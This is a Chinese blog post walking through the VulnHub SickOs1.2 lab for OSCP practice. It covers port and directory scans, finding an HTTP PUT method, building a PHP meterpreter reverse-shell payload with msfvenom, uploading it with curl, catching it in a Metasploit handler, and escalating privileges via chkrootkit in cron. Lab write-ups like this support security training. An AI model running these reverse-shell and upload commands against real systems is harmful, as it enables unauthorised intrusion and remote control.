OSCP备战-SickOs1.2靶场详细步骤

于 2025-05-29 23:21:27 发布
阅读量323 收藏 6
点赞数 5
CC 4.0 BY-SA版权
分类专栏: 靶场 文章标签: web安全 linux 安全 网络安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2301_81864699/article/details/148319800

一、靶机介绍

靶机基本信息:

靶机下载链接https://www.vulnhub.com/entry/sickos-12,144/
作者D4rk
发布日期2016年4月27日
难度中等

二、信息搜集

记得将网络连接改成nat模式
1、    目标IP探测
 
目标IP:192.168.155.186
2、    端口扫描

nmap -p- --min-rate 1000 -T4 192.168.155.186


 

   nmap -p22,80 -sV -sC -A  --min-rate 1000 -T4 192.168.155.186


 
三、GETshell


信息不多一个ssh,一个站点。先去站点看看情况
给出一张图片:病毒真的是杀毒公司为了钱而制作的吗
 
查看源码没有什么东西,目录扫描一遍
dirsearch -u http://192.168.155.186
 

好像没有什么有用信息
 
可以确定入口了,查询一下:

searchsploit lighttp


 
但是没有看到1.4.28版本对应漏洞
查询一下网址请求方法:

curl http://192.168.155.186/test/ -vv -X OPTIONS



看到有PUT方法,结合之前的访问目录,猜测文件上传访问反弹shell
制作php脚本

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.155.166 LPORT=443 >shell4431.php



上传:

curl -v -H "Expect:" -T shell4431.php "http://192.168.155.186/test/"



打开msf:

use exploit/multi/handler
show options
set lhost IP
set lport 443
run


 
成功
 

四、提权


内核提权,查看发行版本:

cat /etc/os-release



 
有脚本但是不行
 
列出与系统定时目录相关的文件和配置

ls -la /etc/cron*



找到一个 chkrootkit
有漏洞利用,一个说明文档一个msf脚本
 
将会话放置后台
 


进入特定会话
 

 set seesion 1


成功
 
完成
 

靶机渗透(九)SickOs1.2
qq_42180996的博客
05-07 2726
靶机SickOs1.2 一、实验环境 二、实验步骤 (一)信息收集 1.查看测试机的IP信息,判断所处网段 2.主机发现(netdiscover) 3.端口扫描(masscan/nmap) 4.网站指纹信息扫描(whatweb) (二)Web渗透 1.浏览web网页(80端口) 2.远程登录(22端口) 3.目录扫描(dirb) (三)获取shell 1.方法一:P...
oscp备考,oscp系列——sickos1.2靶场,PUT上传一句话木马,计划任务:chkrootkit 0.49 提权
最新发布
2202_75361164的博客
02-09 904
oscp备考,oscp系列——sickos1.2靶场,PUT上传一句话木马,计划任务:chkrootkit 0.49 提权 难度简单 nmap 主机发现 端口扫描 vuln扫描 目录扫描 只扫出来一个test目录,存在目录穿越 lighttpd/1.4.28也没有什么漏洞 查看源码,有一个提示 尝试OpenSSH <= 6.6 SFTP漏洞 需要账号密码,失败 现在只剩下一个空的test目录,这里绝对有利用点,再次尝试收集,使用nmap进行test目录扫描 发现存在PUT方法,尝试 上传一句
SICKOS: 1.2
MD@@nr丫卡uer
12-18 416
#1寻找目标 nmap -sS -O 192.168.1.0/24 确定ip 192.168.1.124 #2扫描端口 nmap -sS -O -sV 192.168.1.124 发现开放80端口,从web入手。 #3寻找入口 查看源代码,没东⻄。 扫描一下目录 访问瞅瞅,注意到lighttpd/1.4.28 找找有没有能利用的,没有发现能利用的 使用nikto扫描一下,看到一些信息 nikto -host 192.168.1.124 nmap看一下http中开启的methods方法,有个pu
Vulnhub靶机 SickOs1.2
菜浪马废的博客
04-25 275
没啥有用的东西 只有一个test 可以用put方式 试了好几个端口4444 1180 1234都不行 换了443可以了 成功提权 就用了一种方法 这有个大佬,写的超级详细 传送门 ...
vulhub-SickOs: 1.2
战神/calmness的博客
05-24 270
目录 信息收集 文件包含 提权-计划任务-chkrootkit版本0.49漏洞 信息收集 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0) 80/tcp open http lighttpd 1.4.28 MAC Address: 00:0C:29:BA:70:AF (VMware) Service Inf..
vulnhub SickOs: 1.2
箭雨镜屋
01-14 2847
渗透思路: nmap扫描---->dirb扫描---->通过PUT方法上传php反弹shell---->利用chkrootkit漏洞提权
javasnmp源码-OSCP-PWK-Notes-Public:OSCP-PWK-Notes-Public
06-04
OSCP 笔记 更加努力 欢迎 在卡利寻找自己的方式 查找、定位和哪个 定位 从由updatedb准备的数据库中读取 updatedb locate sdb.exe 哪一个 返回将在当前环境中执行的文件或链接的路径名。 它通过搜索 PATH 变量来做到...
java红酒网站源码-OSCP-PWK-Notes-Public:OSCP-PWK-Notes-Public
06-05
OSCP 笔记 更加努力 欢迎 在卡利寻找自己的方式 查找、定位和哪个 定位 从由updatedb准备的数据库中读取 updatedb locate sdb.exe 哪一个 返回将在当前环境中执行的文件或链接的路径名。 它通过搜索 PATH 变量来做到...
本地靶场搭建--常见靶场环境集锦
04-28
下面将详细介绍这些靶场环境以及它们所涉及的知识点。 1. DVWA (Damn Vulnerable Web Application) DVWA 是一个开源的Web应用,旨在为安全专业人员提供一个可练习安全漏洞检测和防御的环境。它包含了SQL注入、跨站...
OSCP-Human-Guide:我自己的OSCP指南
05-12
OSCP-人类指南 编辑我目前正在将所有OSCP内容和其他内容移动到“ ”中。 该存储库将没有更多更新。 带来不便敬请谅解。 该页面是一些技巧的真实记录,真正的指南是 我自己的OSCP指南,包括一些礼物,我自己制作的和...
Vulnhub-靶机-SickOs 1.2
qq_43264813的博客
03-05 438
Vulnhub—靶机—SickOs 1.2 本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关 文章目录Vulnhub—靶机—SickOs 1.2一、信息收集二、漏洞利用三、Flag 一、信息收集 【步骤一】使用nmap确定目标靶机地址: 【命令】nmap -sP 192.168.43.0/24 【步骤二】对目标靶机进行全端口扫描: 【命令】nmap -n -T4 -sV -p- 192.168.43.54 【步骤三】尝试22端口弱口令
Vulnhub靶机:SickOs1.2
qq_48904485的博客
03-21 1061
运行环境:Virtualbox攻击机:kali(10.0.2.4)靶机:SickOs 1.210.0.2.15)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/sickos-12,144/
Vulnhub-SickOs:1.2
cr7lyl的博客
09-11 1054
记一次Vulnhub-SickOs1.2渗透过程
靶机实战-SickOs1.2
滕财然的博客
01-27 623
SickOs1.2靶机实战 文章目录SickOs1.2靶机实战1、主机发现2、端口扫描3、端口详细信息扫描4、访问80端口--http服务Getshell方式一Getshell方式二5、提权方式一方式二方法三//这一个方法我没成功,你们可以尝试一下 1、主机发现 arp扫描 目标IP:192.168.232.161 2、端口扫描 目标开放80、22端口 3、端口详细信息扫描 4、访问80端口...
靶机渗透实战——SickOs1.2
wlw876747595的博客
12-17 1021
一、实验环境 靶机:SickOs1.2,IP地址暂时未知 测试机:Kali(IP:192.168.232.130) 测试机:物理机win7 二、实验流程 信息收集——主机发现 信息收集——端口扫描 渗透测试 三、实验步骤 (一)信息收集——主机发现 1、查看kaliIP信息 2、查看靶机页面 3、扫描主机(netdiscover) netdiscover -i e...
vulnhub靶场-sickos1.2
zzzzzzkeai的博客
12-08 353
vulnhub靶场--sickos1.2靶场
SICKOS 1.2 WALKTHROUGH
weixin_41082546的博客
08-11 431
SickOs:1.2 https://www.vulnhub.com/entry/sickos-12,144/ 首先获取目标ip地址,并探测端口 netdiscover -i eth0 -r 192.168.88.1/24 访问web,并查看源码,没有什么有用的东西 目录发现 dirbhttp://192.168.88.201 nikto -hhtt...
【vulnhub】SickOs1.2 靶机
Nicky_Zheng的博客
01-29 644
1、 信息收集 1.1、主机发现 使用netdiscover扫描靶机ip kali@kali:~$ sudo netdiscover -i eth1 6 Captured ARP Req/Rep packets, from 3 hosts. Total size: 360 _____________________________________________________________________________ IP At M
OSCP-PWK: 优化Kali Linux配置与终端美化指南
"OSCP-PWK-master"作为压缩包文件的名称,暗示了包含的文件可能是与OSCP认证相关或者与Penetration Testing with Kali(PWK)课程相关的资料。"master"通常表示这是主文件或者是文件的最新版本。这可能是一个包含了...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值